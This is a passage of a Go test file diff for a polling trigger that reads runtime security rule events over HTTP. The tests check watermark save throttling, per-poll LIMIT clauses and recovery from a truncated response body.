+ const row1 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000001","hostname":"node-1"}`
+ const row2 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000002","hostname":"node-1"}`
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := atomic.AddInt64(&calls, 1)
+ if n%2 == 1 {
+ _, _ = w.Write([]byte(row1 + "\n"))
+ } else {
+ _, _ = w.Write([]byte(row2 + "\n"))
+ }
+ }))
+ defer srv.Close()
+
+ store := &fakeStore{loadOK: false}
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 10 * time.Millisecond,
+ Watermark: store,
+ WatermarkSaveInterval: 100 * time.Millisecond,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+ go func() {
+ for range ch {
+ }
+ }()
+
+ time.Sleep(250 * time.Millisecond) // ≥ 25 polls, ~2-3 save intervals
+ saves := store.savedCount()
+ pollCalls := int(atomic.LoadInt64(&calls))
+ if pollCalls < 10 {
+ t.Fatalf("expected many polls in 250ms; got %d", pollCalls)
+ }
+ if saves >= pollCalls {
+ t.Fatalf("saves not throttled: %d saves vs %d polls", saves, pollCalls)
+ }
+ if saves == 0 {
+ t.Fatalf("no watermark saves at all in 250ms with active rows")
+ }
+}
+
+// TestTrigger_LimitsRowsPerPoll — every query carries LIMIT N so
+// catch-up after a stale watermark doesn't translate into one giant
+// scan that times out.
+func TestTrigger_LimitsRowsPerPoll(t *testing.T) {
+ queries := make(chan string, 256)
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ PollLimit: 250,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ _, _ = tr.Subscribe(ctx)
+ select {
+ case q := <-queries:
+ if !strings.Contains(q, "LIMIT 250") {
+ t.Fatalf("query missing LIMIT clause: %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first poll")
+ }
+}
+
+// TestTrigger_PartialBodyReadStillAdvances — server emits one
+// well-formed line then closes the connection mid-second-line. The
+// trigger must still emit the first event AND advance its watermark
+// so the next poll picks up from there, instead of looping forever
+// on the same start watermark.
+func TestTrigger_PartialBodyReadStillAdvances(t *testing.T) {
+ const goodLine = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"5000","hostname":"node-1"}`
+ queries := make(chan string, 256)
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ queries <- r.URL.Query().Get("query")
+ n := atomic.AddInt64(&calls, 1)
+ if n == 1 {
+ // Take over the raw conn so we can write a valid HTTP response
+ // then close the connection mid-stream — emulating the
+ // production failure mode where CH starts streaming, the
+ // HTTP timeout fires, and the body read returns mid-line.
+ hj, ok := w.(http.Hijacker)
+ if !ok {
+ t.Fatalf("ResponseWriter does not support Hijack")
+ }
+ conn, bufrw, err := hj.Hijack()
+ if err != nil {
+ t.Fatalf("Hijack: %v", err)
+ }
+ _, _ = io.WriteString(bufrw, "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain; charset=utf-8\r\n\r\n")
+ _, _ = io.WriteString(bufrw, goodLine+"\n")
+ _, _ = io.WriteString(bufrw, "{\"RuleID\":\"R2\",\"Runtime")
+ _ = bufrw.Flush()
+ _ = conn.Close()
+ return
+ }
+ _, _ = w.Write([]byte(""))
+ }))
+ defer srv.Close()
+
+ tr, _ := New(Config{
+ Endpoint: srv.URL, Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+
+ select {
+ case ev := <-ch:
+ if ev.Target.PID != 1 {
+ t.Fatalf("first event PID = %d, want 1", ev.Target.PID)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for first event from partial body")
+ }
+
+ // First poll's query went to ch; drain it then wait for the second
+ // poll and assert the watermark advanced past 0.
+ <-queries
+ select {
+ case q := <-queries:
+ // post-#10/trigger-unit-normalize: the good line emits event_time="5000"
+ // (seconds); the advanced watermark goes through the multiIf with the
+ // sec→ns multiplier (× 1e9) → 5_000_000_000_000.
+ if !strings.Contains(q, ") >= 5000000000000") {
+ t.Fatalf("watermark did not advance on partial read; second query: %q", q)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("timeout waiting for second poll")
+ }
+}